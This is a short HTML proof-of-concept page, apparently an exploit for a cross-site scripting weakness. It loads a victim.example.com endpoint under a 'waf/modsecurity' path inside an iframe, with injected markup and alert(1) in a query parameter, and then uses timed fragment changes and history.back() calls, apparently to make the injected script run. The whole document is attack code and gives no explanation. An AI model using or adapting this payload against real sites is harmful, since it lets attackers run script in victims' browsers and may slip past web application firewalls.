

<iframe src="http://victim.example.com/repo/waf/modsecurity/ajaxify.php?inj=<div class=document-script>alert(1)</div>">
</iframe>

<script>

var frame = document.querySelector("iframe");
var url = frame.src;
setTimeout(function() {
  frame.src = frame.src + "#foo" 


  setTimeout(function() {
    frame.src = frame.src.substring(0, frame.src.length -4)

    setTimeout(function() {
      history.back();
      setTimeout(function() {
        history.back();
      }, 1000);
    },1000)
  }, 1000)
}, 1000)

</script>

